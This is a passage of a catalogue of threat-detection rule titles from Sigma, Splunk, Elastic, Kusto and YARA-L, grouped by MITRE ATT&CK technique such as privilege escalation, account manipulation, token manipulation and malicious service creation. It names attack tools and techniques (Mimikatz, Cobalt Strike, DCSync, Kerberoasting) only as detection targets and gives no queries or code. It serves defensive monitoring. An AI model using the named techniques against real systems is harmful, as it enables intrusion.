- Splunk Executable Running as NT AUTHORITY_SYSTEM Registered in BAM (Windows Event Log)
- Elastic Expired or Revoked Driver Loaded production
- Sigma Exploiting CVE-2019-1388 stable
- Sigma Exploiting SetupComplete.cmd CVE-2019-1378 test
- Splunk First Time Seen Child Process of Zoom experimental
- YARA-L Hacktool - SharpSuccessor Execution
- Sigma HackTool - SysmonEOP Execution test
- Sigma HKTL - SharpSuccessor Privilege Escalation Tool Execution experimental
- Sigma InstallerFileTakeOver LPE CVE-2021-41379 File Create Event test
- Sigma Kerberos ticket without a trailing $ (CVE-2021-42278/42287) experimental
- Splunk Kernel Service Installed - Windows (Windows Event Log)
- Sigma Malicious Driver Load test
- Sigma Malicious Driver Load By Name test
- Elastic Modification of the msPKIAccountCredentials production
- Sigma Non-Standard Nsswitch.Conf Creation - Potential CVE-2025-32463 Exploitation experimental
- Elastic Persistence via Update Orchestrator Service Hijack production
- Sigma Potential CVE-2021-41379 Exploitation Attempt test
- Sigma Potential CVE-2024-35250 Exploitation Activity experimental
- Elastic Potential Escalation via Vulnerable MSI Repair production
- Sigma Potential Exploitation of CrushFTP RCE Vulnerability (CVE-2025-54309) experimental
- Elastic Potential Privilege Escalation via InstallerFileTakeOver production
- Elastic Potential Privileged Escalation via SamAccountName Spoofing production
- Sigma Potential SystemNightmare Exploitation Attempt test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma Privilege SeMachineAccountPrivilege abuse experimental
- Sigma Process Explorer Driver Creation By Non-Sysinternals Binary test
- Sigma Process Monitor Driver Creation By Non-Sysinternals Binary test
- Elastic Remote Computer Account DnsHostName Update production
- Splunk Spoolsv Suspicious Process Access production
- Sigma Sudo Privilege Escalation CVE-2019-14287 test
- Splunk Suspicious .sys Created - Windows (Sysmon)
- Sigma Suspicious Kerberos proxiable/S4U2self ticket (CVE-2021-42278/42287) experimental
- Elastic Suspicious Print Spooler File Deletion production
- Elastic Suspicious Print Spooler Point and Print DLL production
- Sigma Suspicious Spool Service Child Process test
- Sigma Suspicious Sysmon as Execution Parent test
- Elastic Unusual Print Spooler Child Process production
- Sigma Vulnerable Driver Load test
- Sigma Vulnerable Driver Load By Name test
- Splunk Windows Driver Load Non-Standard Path production
- Splunk Windows Drivers Loaded by Signature production
- Splunk Windows MSI Rollback Script Deleted By Non-Msiexec Process production
- Splunk Windows Potato Privilege Escalation Tool Execution production
- Splunk Windows Privilege Escalation Attempt Via MSI Rollback production
- Splunk Windows Privilege Escalation Suspicious Process Elevation production
- Splunk Windows Privilege Escalation System Process Without System Parent production
- Splunk Windows Privilege Escalation User Process Spawn System Process production
- Splunk Windows Remote Image Load production
- Splunk Windows Service Create Kernel Mode Driver production
- Splunk Windows System File on Disk production
- Splunk ZeroLogon CVE-2020-1472 (Windows Event Log)
Valid Accounts T1078 67 rules
- Elastic Access to a Sensitive LDAP Attribute production
- Kusto Account added and removed from privileged groups
- Elastic Account Discovery Command via SYSTEM Account production
- Sigma Account renamed to admin (or likely) account to evade defense experimental
- Splunk Account set to active via Net.exe (EDR)
- Splunk Account set to active via Net.exe (Sysmon)
- Splunk Account set to active via Net.exe (Windows Event Log)
- Sigma Account Tampering - Suspicious Failed Logon Reasons test
- Sigma Admin User Remote Logon test
- Elastic AdminSDHolder Backdoor production
- Kusto AdminSDHolder Modifications
- Elastic AdminSDHolder SDProp Exclusion Added production
- Sigma Azure Windows virtual machine login via serial console experimental
- Sigma Commvault QLogin with PublicSharingUser and GUID Password (CVE-2025-57788) experimental
- Elastic Delegated Managed Service Account Modification by an Unusual User production
- Elastic dMSA Account Creation by an Unusual User production
- Sigma DMSA Link Attributes Modified experimental
- Sigma DMSA Service Account Created in Specific OUs - PowerShell experimental
- Kusto EatonForeseer - Unauthorized Logins available
- Kusto Email access via active sync
- Sigma External Remote RDP Logon from Public IP test
- Sigma External Remote SMB Logon from Public IP test
- Sigma Failed Logon From Public IP test
- Elastic First Time Seen Account Performing DCSync production
- Kusto Group created then added to built in domain local or global group
- Elastic Kerberos Pre-authentication Disabled for User production
- Sigma Lateral movement detection (based on "special groups" feature) experimental
- Elastic Mounting Hidden or WebDav Remote Shares production
- Splunk Multiple Host logons (Windows Event Log)
- Kusto Multiple Password Reset by user
- Sigma Network login performed to multiple targets experimental
- Sigma New DMSA Service Account Created in Specific OUs experimental
- Kusto New user created and added to the built-in administrators group
- Sigma Password Provided In Command Line Of Net.EXE test
- Elastic Potential Account Takeover - Logon from New Source IP production
- Elastic Potential Account Takeover - Mixed Logon Types production
- Elastic Potential Credential Access via DCSync production
- Elastic Potential Privileged Escalation via SamAccountName Spoofing production
- Elastic Remote Computer Account DnsHostName Update production
- Splunk Rubeus Password Change (Windows Event Log)
- Splunk Short Lived Windows Accounts production
- Kusto Sign-ins from IPs that attempt sign-ins to disabled accounts (Uses Authentication Normalization)
- Sigma Success login attempt on a Windows OpenSSH server experimental
- Splunk Suspicious Computer Account Name Change production
- Sigma Suspicious Computer Machine Password by PowerShell test
- Splunk Suspicious Kerberos Service Ticket Request production
- Sigma Suspicious Remote Logon with Explicit Credentials test
- Splunk Suspicious Ticket Granting Ticket Request production
- Splunk Unusual Number of Computer Service Tickets Requested experimental
- Splunk Unusual Number of Remote Endpoint Authentication Events experimental
- Kusto User account added to built in domain local or global group
- Kusto User account created and deleted within 10 mins
- Kusto User account enabled and disabled within 10 mins
- Sigma User Added to Local Administrator Group stable
- Kusto User login from different countries within 3 hours (Uses Authentication Normalization)
- Splunk Windows Azure PowerShell Module Installation Via PowerShell Script production
- Splunk Windows ConvertTo-AADIntBackdoor Execution Via PowerShell Script production
- Splunk Windows Entra User Management Via Azure CLI production
- Splunk Windows Group Policy Object Created production
- Splunk Windows Guest Account Enabled Via Net.EXE production
- Splunk Windows Large Number of Computer Service Tickets Requested production
- Splunk Windows Multiple Account Passwords Changed production
- Splunk Windows Multiple Accounts Deleted production
- Splunk Windows Multiple Accounts Disabled production
- Splunk Windows PowerView AD Access Control List Enumeration production
- Splunk WMIC Explicit Credentials (Sysmon)
- Splunk WMIC Explicit Credentials (Windows Event Log)
Valid Accounts: Default Accounts T1078.001 6 rules
- Splunk Account set to active via Net.exe (EDR)
- Splunk Account set to active via Net.exe (Sysmon)
- Splunk Account set to active via Net.exe (Windows Event Log)
- Sigma Admin User Remote Logon test
- Sigma Commvault QLogin with PublicSharingUser and GUID Password (CVE-2025-57788) experimental
- Splunk Windows Guest Account Enabled Via Net.EXE production
Valid Accounts: Domain Accounts T1078.002 20 rules
- Elastic Access to a Sensitive LDAP Attribute production
- Sigma Account renamed to admin (or likely) account to evade defense experimental
- Sigma Admin User Remote Logon test
- Elastic AdminSDHolder Backdoor production
- Elastic AdminSDHolder SDProp Exclusion Added production
- Elastic Delegated Managed Service Account Modification by an Unusual User production
- Elastic dMSA Account Creation by an Unusual User production
- Sigma DMSA Link Attributes Modified experimental
- Sigma DMSA Service Account Created in Specific OUs - PowerShell experimental
- Elastic First Time Seen Account Performing DCSync production
- Elastic Kerberos Pre-authentication Disabled for User production
- Sigma New DMSA Service Account Created in Specific OUs experimental
- Elastic Potential Credential Access via DCSync production
- Elastic Potential Privileged Escalation via SamAccountName Spoofing production
- Elastic Remote Computer Account DnsHostName Update production
- Splunk Suspicious Computer Account Name Change production
- Splunk Suspicious Kerberos Service Ticket Request production
- Splunk Suspicious Ticket Granting Ticket Request production
- Splunk Windows Group Policy Object Created production
- Splunk Windows PowerView AD Access Control List Enumeration production
Valid Accounts: Local Accounts T1078.003 4 rules
- Elastic Account Discovery Command via SYSTEM Account production
- Sigma Admin User Remote Logon test
- Elastic Mounting Hidden or WebDav Remote Shares production
- Splunk Short Lived Windows Accounts production
Valid Accounts: Cloud Accounts T1078.004 1 rule
- Splunk Windows Entra User Management Via Azure CLI production
Account Manipulation T1098 113 rules
- Sigma A Member Was Added to a Security-Enabled Global Group stable
- Sigma A Member Was Removed From a Security-Enabled Global Group stable
- Sigma A New Trust Was Created To A Domain stable
- Sigma A Security-Enabled Global Group Was Deleted stable
- Kusto Account added and removed from privileged groups
- Elastic Account Configured with Never-Expiring Password production
- Sigma Account marked as sensitive and cannot be delegated had its protection removed (weakness introduction) experimental
- Elastic Account Password Reset Remotely production
- Sigma Account password set to never expire. experimental
- Splunk Account set to active via Net.exe (EDR)
- Splunk Account set to active via Net.exe (Sysmon)
- Splunk Account set to active via Net.exe (Windows Event Log)
- Sigma Account set with Kerberos DES encryption activated (weakness introduction) experimental
- Sigma Account set with Kerberos pre-authentication not required (AS-REP Roasting) experimental
- Sigma Account set with password not required (weakness introduction) experimental
- Sigma Account set with reversible encryption (weakness introduction) experimental
- Elastic Active Directory Group Modification by SYSTEM production
- Sigma Active Directory User Backdoors test
- Kusto AD account with Don't Expire Password
- Kusto AD user enabled and password not set within 48 hours available
- Elastic AdminSDHolder Backdoor production
- Elastic AdminSDHolder SDProp Exclusion Added production
- Sigma Computer account created with privileges experimental
- Sigma Computer account manipulation for delegation (RBCD) experimental
- Sigma Computer account renamed without a trailing $ (CVE-2021-42278/42287) experimental
- Splunk Create_Add Local_Domain User (EDR)
- Splunk Create_Add Local_Domain User (Sysmon)
- Splunk Create_Add Local_Domain User (Windows Event Log)
- Elastic Delegated Managed Service Account Modification by an Unusual User production
- Kusto DEV-0270 New User Creation available
- Sigma Disabled guest or builtin account activated experimental
- Sigma Disabled guest or builtin account activated (command)
- Elastic dMSA Account Creation by an Unusual User production
- Sigma DMSA Link Attributes Modified experimental
- Sigma DMSA Service Account Created in Specific OUs - PowerShell experimental
- Sigma Domain group membership change experimental
- Kusto DSRM Account Abuse
- Sigma DSRM password changed (native) experimental
- Sigma DSRM password changed (Reg via command) experimental
- Sigma DSRM password changed (Reg via PowerShell) experimental
- Sigma Enabled User Right in AD to Control User Objects test
- Kusto Group created then added to built in domain local or global group
- Sigma Hidden account creation (with fast deletion) experimental
- Sigma High risk Active Directory group membership change experimental
- Sigma High risk local/domain local group membership change experimental
- Sigma Host constrained delegation settings changed for potential abuse (Rubeus) - Any protocol experimental
- Sigma Host constrained delegation settings changed for potential abuse (Rubeus) - Kerberos only experimental
- Sigma Host set with constrained delegation experimental
- Sigma Host set with unconstrained delegation experimental
- Sigma Host unconstrained delegation settings changed for potential abuse (Rubeus) experimental
- Elastic Kerberos Pre-authentication Disabled for User production
- Elastic KRBTGT Delegation Backdoor production
- Kusto Local Admin Group Changes available
- Sigma Local group membership change experimental
- Sigma Medium risk Active Directory group membership change experimental
- Sigma Medium risk local/domain local group membership change experimental
- Sigma Member added to DNSadmin group experimental
- Splunk Member added to security-enabled global group (Windows Event Log)
- Elastic Modification of the msPKIAccountCredentials production
- Elastic New ActiveSyncAllowedDeviceID Added via PowerShell production
- Sigma New DMSA Service Account Created in Specific OUs experimental
- Sigma New member added to a "OCS/Lync/Skype for Business" administration group (low risk) experimental
- Sigma New member added to a "OCS/Lync/Skype for Business" administration group (medium risk) experimental
- Sigma New member added to an "OCS/Lync/Skype for Business" administration group (high risk) experimental
- Sigma New member added to an Exchange administration group (high risk) experimental
- Sigma New member added to an Exchange administration group (medium risk) experimental
- Kusto New user created and added to the built-in administrators group
- Sigma Password Change on Directory Service Restore Mode (DSRM) Account stable
- Sigma Password Set to Never Expire via WMI experimental
- Elastic Potential Active Directory Replication Account Backdoor production
- Elastic Potential Privileged Escalation via SamAccountName Spoofing production
- Elastic Potential Shadow Credentials added to AD Object production
- Sigma Powershell LocalAccount Manipulation test
- Sigma Powerview Add-DomainObjectAcl DCSync AD Extend Right test
- Sigma Privilege SeMachineAccountPrivilege abuse experimental
- Elastic Sensitive Privilege SeEnableDelegationPrivilege assigned to a Principal production
- Kusto Shadow Credentials Added to Account
- Kusto Shadow Credentials Added to Account (Alternative)
- Kusto Sign-ins from IPs that attempt sign-ins to disabled accounts (Uses Authentication Normalization)
- Sigma SPN added to an account by command line experimental
- Sigma Suspicious Computer Account Name Change CVE-2021-42287 test
- Sigma Suspicious modification of a computer account SPN experimental
- Sigma Suspicious modification of a fake domain controller SPN (DCshadow) experimental
- Sigma Suspicious modification of a fake domain controller SPN (DCshadow) (Directory Services) experimental
- Sigma Suspicious modification of a user account SPN to enable Kerberoast attack experimental
- Kusto User account added to built in domain local or global group
- Kusto User account created and deleted within 10 mins
- Sigma User account creation disguised in a computer account experimental
- Kusto User account enabled and disabled within 10 mins
- Elastic User account exposed to Kerberoasting production
- Sigma User added to a group via commandline
- Sigma User Added To Highly Privileged Group test
- Sigma User Added to Local Administrator Group stable
- Sigma User Added to Local Administrators Group test
- Elastic User Added to Privileged Group in Active Directory production
- Sigma User password change using current hash password - ChangeNTLM (Mimikatz) experimental
- Sigma User password change without previous password known - SetNTLM (Mimikatz) experimental
- Splunk Windows AD add Self to Group production
- Splunk Windows AD DSRM Account Changes production
- Splunk Windows AD DSRM Password Reset production
- Splunk Windows AD Privileged Group Modification production
- Splunk Windows AD Self DACL Assignment production
- Splunk Windows AD ServicePrincipalName Added To Domain Account production
- Splunk Windows AD Short Lived Domain Account ServicePrincipalName production
- Splunk Windows Azure PowerShell Module Installation Via PowerShell Script production
- Splunk Windows DnsAdmins New Member Added production
- Splunk Windows Entra User Management Via Azure CLI production
- Splunk Windows Increase in Group or Object Modification Activity production
- Splunk Windows Increase in User Modification Activity production
- Splunk Windows Multiple Account Passwords Changed production
- Splunk Windows Multiple Accounts Deleted production
- Splunk Windows Multiple Accounts Disabled production
- Elastic WRITEDAC Access on Active Directory Object production
Account Manipulation: Additional Email Delegate Permissions T1098.002 1 rule
- Elastic New ActiveSyncAllowedDeviceID Added via PowerShell production
Account Manipulation: Additional Local or Domain Groups T1098.007 1 rule
- Elastic User Added to Privileged Group in Active Directory production
Access Token Manipulation T1134 49 rules
- Kusto Access Token Manipulation - Create Process with Token available
- Sigma Addition of SID History to Active Directory Object stable
- Sigma Anonymous login (RottenPotatoNG) experimental
- Sigma HackTool - Impersonate Execution test
- Sigma HackTool - Koh Default Named Pipe test
- Sigma HackTool - NoFilter Execution test
- Sigma HackTool - PPID Spoofing SelectMyParent Tool Execution test
- Sigma HackTool - SharpDPAPI Execution test
- Sigma HackTool - SharpImpersonation Execution test
- Sigma Meterpreter or Cobalt Strike Getsystem Service Installation - Security test
- Sigma Meterpreter or Cobalt Strike Getsystem Service Installation - System test
- Sigma New rights granted to an account for privilege escalation experimental
- Elastic Parent Process PID Spoofing production
- Kusto Possible Resource-Based Constrained Delegation Abuse
- Sigma Potential Access Token Abuse test
- Sigma Potential Meterpreter/CobaltStrike Activity test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Elastic Privilege Escalation via Named Pipe Impersonation production
- Elastic Privilege Escalation via Rogue Named Pipe Impersonation production
- Sigma Privilege escalation via runas (command) experimental
- Sigma Privilege escalation via RunasCS experimental
- Elastic Privileges Elevation via Parent Process PID Spoofing production
- Elastic Process Created with a Duplicated Token production
- Elastic Process Created with an Elevated Token production
- Elastic Process Creation via Secondary Logon production
- Kusto PRT Credential Stealing
- Sigma PUA - AdvancedRun Execution test
- Sigma PUA - AdvancedRun Suspicious Execution test
- Sigma RedSun - Conhost.exe Spawned by TieringEngineService.exe experimental
- Splunk Runas Execution in CommandLine production
- Elastic SeDebugPrivilege Enabled by a Suspicious Process production
- Kusto Service Principal Name (SPN) Assigned to User Account
- Sigma Suspicious Child Process Created as System test
- Elastic Suspicious SeIncreaseBasePriorityPrivilege Use production
- Sigma Suspicious SYSTEM User Process Creation test
- Elastic Unusual Parent-Child Relationship production
- Splunk Windows Access Token Manipulation SeDebugPrivilege production
- Splunk Windows Access Token Manipulation Winlogon Duplicate Token Handle production
- Splunk Windows Access Token Winlogon Duplicate Handle In Uncommon Path production
- Splunk Windows AD Cross Domain SID History Addition production
- Splunk Windows AD Privileged Account SID History Addition production
- Splunk Windows AD Same Domain SID History Addition production
- Splunk Windows AD SID History Attribute Modified production
- Splunk Windows Handle Duplication in Known UAC-Bypass Binaries production
- Splunk Windows Parent PID Spoofing with Explorer production
- Splunk Windows Privilege Escalation Suspicious Process Elevation production
- Splunk Windows Privilege Escalation System Process Without System Parent production
- Splunk Windows Privilege Escalation User Process Spawn System Process production
- Splunk Wscript Or Cscript Suspicious Child Process production
Access Token Manipulation: Token Impersonation/Theft T1134.001 18 rules
- Sigma Anonymous login (RottenPotatoNG) experimental
- Sigma HackTool - Impersonate Execution test
- Sigma HackTool - Koh Default Named Pipe test
- Sigma HackTool - NoFilter Execution test
- Sigma HackTool - SharpDPAPI Execution test
- Sigma HackTool - SharpImpersonation Execution test
- Sigma Meterpreter or Cobalt Strike Getsystem Service Installation - Security test
- Sigma Meterpreter or Cobalt Strike Getsystem Service Installation - System test
- Sigma Potential Access Token Abuse test
- Sigma Potential Meterpreter/CobaltStrike Activity test
- Elastic Privilege Escalation via Named Pipe Impersonation production
- Elastic Privilege Escalation via Rogue Named Pipe Impersonation production
- Elastic Process Created with a Duplicated Token production
- Kusto PRT Credential Stealing
- Splunk Runas Execution in CommandLine production
- Splunk Windows Access Token Manipulation Winlogon Duplicate Token Handle production
- Splunk Windows Access Token Winlogon Duplicate Handle In Uncommon Path production
- Splunk Windows Handle Duplication in Known UAC-Bypass Binaries production
Access Token Manipulation: Create Process with Token T1134.002 16 rules
- Kusto Access Token Manipulation - Create Process with Token available
- Sigma Meterpreter or Cobalt Strike Getsystem Service Installation - Security test
- Sigma Meterpreter or Cobalt Strike Getsystem Service Installation - System test
- Sigma Potential Meterpreter/CobaltStrike Activity test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma Privilege escalation via runas (command) experimental
- Sigma Privilege escalation via RunasCS experimental
- Elastic Privileges Elevation via Parent Process PID Spoofing production
- Elastic Process Created with a Duplicated Token production
- Elastic Process Created with an Elevated Token production
- Elastic Process Creation via Secondary Logon production
- Sigma PUA - AdvancedRun Execution test
- Sigma PUA - AdvancedRun Suspicious Execution test
- Sigma RedSun - Conhost.exe Spawned by TieringEngineService.exe experimental
- Sigma Suspicious Child Process Created as System test
- Splunk Windows Access Token Manipulation SeDebugPrivilege production
Access Token Manipulation: Make and Impersonate Token T1134.003 4 rules
- Sigma HackTool - Impersonate Execution test
- Sigma HackTool - SharpDPAPI Execution test
- Sigma HackTool - SharpImpersonation Execution test
- Elastic Process Creation via Secondary Logon production
Access Token Manipulation: Parent PID Spoofing T1134.004 6 rules
- Sigma HackTool - PPID Spoofing SelectMyParent Tool Execution test
- Elastic Parent Process PID Spoofing production
- Elastic Privileges Elevation via Parent Process PID Spoofing production
- Elastic Unusual Parent-Child Relationship production
- Splunk Windows Parent PID Spoofing with Explorer production
- Splunk Wscript Or Cscript Suspicious Child Process production
Access Token Manipulation: SID-History Injection T1134.005 6 rules
- Sigma Addition of SID History to Active Directory Object stable
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Splunk Windows AD Cross Domain SID History Addition production
- Splunk Windows AD Privileged Account SID History Addition production
- Splunk Windows AD Same Domain SID History Addition production
- Splunk Windows AD SID History Attribute Modified production
Domain or Tenant Policy Modification T1484 33 rules
- Elastic AdminSDHolder SDProp Exclusion Added production
- Sigma Group Policy Abuse for Privilege Addition test
- Elastic Group Policy Abuse for Privilege Addition production
- Splunk Modify Group Policy (Windows Event Log)
- Sigma Modify Group Policy Settings test
- Sigma Modify Group Policy Settings - ScriptBlockLogging test
- Sigma Permissions changed on a Group Policy (GPO) experimental
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Elastic Scheduled Task Execution at Scale via GPO production
- Kusto Shadow Credentials Added to Account
- Kusto Shadow Credentials Added to Account (Alternative)
- Sigma Startup/Logon Script Added to Group Policy Object test
- Elastic Startup/Logon Script added to Group Policy Object production
- Sigma Suspicious modification of a sensitive Group Policy (GPO) experimental
- Splunk Windows AD Dangerous Deny ACL Modification production
- Splunk Windows AD Dangerous Group ACL Modification production
- Splunk Windows AD Dangerous User ACL Modification production
- Splunk Windows AD DCShadow Privileges ACL Addition production
- Splunk Windows AD Domain Replication ACL Addition production
- Splunk Windows AD Domain Root ACL Deletion production
- Splunk Windows AD Domain Root ACL Modification production
- Splunk Windows AD GPO Deleted production
- Splunk Windows AD GPO Disabled production
- Splunk Windows AD GPO New CSE Addition production
- Splunk Windows AD Hidden OU Creation production
- Splunk Windows AD Object Owner Updated production
- Splunk Windows AD Self DACL Assignment production
- Sigma Windows Default Domain GPO Modification experimental
- Sigma Windows Default Domain GPO Modification via GPME experimental
- Splunk Windows Default Group Policy Object Modified production
- Splunk Windows Default Group Policy Object Modified with GPME production
- Splunk Windows Group Policy Object Created production
- Splunk Windows Scheduled Task Created in a Group Policy Object production
Domain or Tenant Policy Modification: Group Policy Modification T1484.001 20 rules
- Sigma Group Policy Abuse for Privilege Addition test
- Elastic Group Policy Abuse for Privilege Addition production
- Splunk Modify Group Policy (Windows Event Log)
- Sigma Modify Group Policy Settings test
- Sigma Modify Group Policy Settings - ScriptBlockLogging test
- Sigma Permissions changed on a Group Policy (GPO) experimental
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Elastic Scheduled Task Execution at Scale via GPO production
- Sigma Startup/Logon Script Added to Group Policy Object test
- Elastic Startup/Logon Script added to Group Policy Object production
- Sigma Suspicious modification of a sensitive Group Policy (GPO) experimental
- Splunk Windows AD GPO Deleted production
- Splunk Windows AD GPO Disabled production
- Splunk Windows AD GPO New CSE Addition production
- Sigma Windows Default Domain GPO Modification experimental
- Sigma Windows Default Domain GPO Modification via GPME experimental
- Splunk Windows Default Group Policy Object Modified production
- Splunk Windows Default Group Policy Object Modified with GPME production
- Splunk Windows Group Policy Object Created production
- Splunk Windows Scheduled Task Created in a Group Policy Object production
Create or Modify System Process T1543 135 rules
- Sigma Allow Service Access Using Security Descriptor Tampering Via Sc.EXE test
- Sigma Atomic MacOS Stealer - Persistence Indicators experimental
- Splunk Clop Ransomware Known Service Name production
- Splunk CMD Echo Pipe - Escalation production
- Sigma CobaltStrike Service Installations - Security test
- Sigma CobaltStrike Service Installations - System test
- Sigma CodeIntegrity - Blocked Driver Load With Revoked Certificate test
- Sigma CodeIntegrity - Blocked Image/Driver Load For Policy Violation test
- Kusto COM Event System Loading New DLL
- Sigma CosmicDuke Service Installation test
- Sigma Deny Service Access Using Security Descriptor Tampering Via Sc.EXE test
- Sigma Devcon Execution Disabling VMware VMCI Device experimental
- Sigma Driver Load From A Temporary Directory test
- Splunk Driver Loaded from Unusual Path - Windows (Sysmon)
- Sigma EAP service activation by Liontail framework for DLL sideloading (via command) stable
- Sigma Encoded PowerShell payload deployed via service experimental
- Splunk Impacket Lateral Movement Commandline Parameters production
- Splunk Impacket Lateral Movement smbexec CommandLine Parameters production
- Splunk Impacket Lateral Movement WMIExec Commandline Parameters production
- Sigma Impacket SMBexec service creation (registry) experimental
- Sigma Impacket SMBexec service registration (native) experimental
- Splunk Kernel Service Installed - Windows (Windows Event Log)
- Sigma KrbRelayUp Service Installation test
- Sigma LiteLLM / TeamPCP Supply Chain Attack Indicators experimental
- Splunk LLM Model File Creation production
- Sigma Malicious Driver Load test
- Sigma Malicious Driver Load By Name test
- Sigma Mimikatz driver deployed via service experimental
- Sigma Mimikatz driver registration (Reg via Sysmon) experimental
- Sigma Moriya Rootkit - System test
- Sigma Moriya Rootkit File Created test
- Elastic Network Logon Provider Registry Modification production
- Sigma New Kernel Driver Via SC.EXE test
- Sigma New PDQDeploy Service - Client Side test
- Sigma New PDQDeploy Service - Server Side test
- Sigma New Service Creation Using PowerShell test
- Sigma New Service Creation Using Sc.EXE test
- Sigma OilRig APT Activity test
- Sigma OilRig APT Registry Persistence test
- Sigma OilRig APT Schedule Task Persistence - Security test
- Sigma OilRig APT Schedule Task Persistence - System test
- Elastic Persistence via Update Orchestrator Service Hijack production
- Elastic Persistence via WMI Standard Registry Provider production
- Sigma Possible impact of 'SMOKEDHAM backdoor' with MSDTC service privilege escalation via command line production
- Splunk Possible Lateral Movement PowerShell Spawn production
- Sigma Potential CobaltStrike Service Installations - Registry test
- Sigma Potential Persistence Attempt Via Existing Service Tampering test
- Elastic Potential Privilege Escalation via Service ImagePath Modification production
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma ProcessHacker Privilege Elevation test
- Sigma PSEXEC Remote Execution File Artefact test
- Splunk PSexec Service Creation (Windows Event Log)
- Sigma PSexec service installation experimental
- Sigma PUA - Kernel Driver Utility (KDU) Execution experimental
- Sigma PUA - Process Hacker Driver Load test
- Sigma PUA - Process Hacker Execution test
- Sigma PUA - System Informer Driver Load test
- Sigma PUA - System Informer Execution test
- Splunk Randomly Generated Windows Service Name experimental
- Kusto Rare Process as a Service available
- Sigma RDP session hijack via service creation abuse experimental
- Sigma Remote Access Tool Services Have Been Installed - Security test
- Sigma Remote Access Tool Services Have Been Installed - System test
- Elastic Remote Windows Service Installed production
- Sigma Service abuse with backdoored "command failure" (Reg via command) experimental
- Sigma Service abuse with backdoored "command failure" (Reg via PowerShell) experimental
- Sigma Service abuse with backdoored "command failure" (service) experimental
- Sigma Service abuse with malicious ImagePath (Reg via PowerShell) experimental
- Sigma Service abuse with malicious ImagePath (service) experimental
- Elastic Service Command Lateral Movement production
- Elastic Service Control Spawned via Script Interpreter production
- Sigma Service creation (command) experimental
- Sigma Service creation (PowerShell) experimental
- Elastic Service Creation via Local Kerberos Authentication production
- Elastic Service DACL Modification via sc.exe production
- Sigma Service Installation in Suspicious Folder test
- Sigma Service Installation with Suspicious Folder Pattern test
- Splunk Service Installed (Windows Event Log)
- Sigma Service Installed By Unusual Client - Security test
- Sigma Service Installed By Unusual Client - System test
- Elastic Service Path Modification production
- Sigma Service permissions hijacked for privileges abuse (PowerShell) experimental
- Sigma Service permissions hijacked for privileges abuse (reg via command) experimental
- Sigma Service permissions hijacked for privileges abuse (Reg via PowerShell) experimental
- Sigma Service permissions hijacked for privileges abuse (service) experimental
- Sigma ServiceDll Hijack test
- Splunk Services LOLBAS Execution Process Spawn production
- Splunk SimpleHelp Remote Access Tool Service Installation (Windows Event Log)
- Sigma Sliver C2 Default Service Installation test
- Sigma StoneDrill Service Install test
- Kusto SUNBURST suspicious SolarWinds child processes (Normalized Process Events)
- Splunk Suspicious .sys Created - Windows (Sysmon)
- Elastic Suspicious ImagePath Service Creation production
- Sigma Suspicious New Service Creation test
- Splunk Suspicious PlistBuddy Usage experimental
- Elastic Suspicious ScreenConnect Client Child Process production
- Sigma Suspicious Service DACL Modification Via Set-Service Cmdlet test
- Sigma Suspicious Service Installation test
- Sigma Suspicious Service Installation Script test
- Sigma Suspicious Service Path Modification test
- Elastic Suspicious Service was Installed in the System production
- YARA-L Suspicious Windows Service Installation Detected
- Sigma Sysinternals PsService Execution test
- Sigma Sysinternals PsSuspend Execution test
- Elastic System Shells via Services production
- Sigma TeamPCP LiteLLM Supply Chain Attack Persistence Indicators experimental
- Kusto TEARDROP memory-only dropper available
- Sigma Turla PNG Dropper Service test
- Sigma Turla Service Install test
- Sigma Uncommon Service Installation Image Path test
- Elastic Unsigned DLL Loaded by Svchost production
- Elastic Unusual Persistence via Services Registry production
- Sigma Vulnerable Driver Load test
- Sigma Vulnerable Driver Load By Name test
- Sigma Vulnerable HackSys Extreme Vulnerable Driver Load test
- Sigma Vulnerable WinRing0 Driver Load test
- Splunk Windows Bluetooth Service Installed From Uncommon Location production
- Splunk Windows KrbRelayUp Service Creation production
- Splunk Windows Local LLM Framework Execution production
- Splunk Windows Process Execution in Temp Dir production
- Splunk Windows Remote Create Service production
- Splunk Windows Service Create Kernel Mode Driver production
- Splunk Windows Service Create RemComSvc production
- Splunk Windows Service Create with Tscon production
- Splunk Windows Service Created (Sysmon)
- Splunk Windows Service Created (Windows Event Log)
- Splunk Windows Service Creation on Remote Endpoint production
- Splunk Windows Service Initiation on Remote Endpoint production
- Elastic Windows Service Installed via an Unusual Client production
- Splunk Windows Suspicious Driver Loaded Path production
- Splunk Windows Suspicious Process File Path production
- Splunk Windows Vulnerable Driver Installed production
- Splunk Windows Vulnerable Driver Loaded production
- Splunk Wscript Or Cscript Suspicious Child Process production
- Splunk XMRIG Driver Loaded production
Create or Modify System Process: Launch Agent T1543.001 1 rule
- Splunk Suspicious PlistBuddy Usage experimental
Create or Modify System Process: Systemd Service T1543.002 2 rules
- Sigma LiteLLM / TeamPCP Supply Chain Attack Indicators experimental
- Sigma TeamPCP LiteLLM Supply Chain Attack Persistence Indicators experimental
Create or Modify System Process: Windows Service T1543.003 108 rules
- Sigma Allow Service Access Using Security Descriptor Tampering Via Sc.EXE test
- Splunk CMD Echo Pipe - Escalation production
- Sigma CobaltStrike Service Installations - Security test
- Sigma CobaltStrike Service Installations - System test
- Sigma CosmicDuke Service Installation test
- Sigma Deny Service Access Using Security Descriptor Tampering Via Sc.EXE test
- Sigma Devcon Execution Disabling VMware VMCI Device experimental
- Sigma Driver Load From A Temporary Directory test
- Splunk Driver Loaded from Unusual Path - Windows (Sysmon)
- Sigma EAP service activation by Liontail framework for DLL sideloading (via command) stable
- Sigma Encoded PowerShell payload deployed via service experimental
- Splunk Impacket Lateral Movement Commandline Parameters production
- Splunk Impacket Lateral Movement smbexec CommandLine Parameters production
- Splunk Impacket Lateral Movement WMIExec Commandline Parameters production
- Sigma Impacket SMBexec service creation (registry) experimental
- Sigma Impacket SMBexec service registration (native) experimental
- Splunk Kernel Service Installed - Windows (Windows Event Log)
- Sigma Malicious Driver Load test
- Sigma Malicious Driver Load By Name test
- Sigma Mimikatz driver deployed via service experimental
- Sigma Mimikatz driver registration (Reg via Sysmon) experimental
- Sigma Moriya Rootkit - System test
- Sigma Moriya Rootkit File Created test
- Sigma New Kernel Driver Via SC.EXE test
- Sigma New PDQDeploy Service - Client Side test
- Sigma New PDQDeploy Service - Server Side test
- Sigma New Service Creation Using PowerShell test
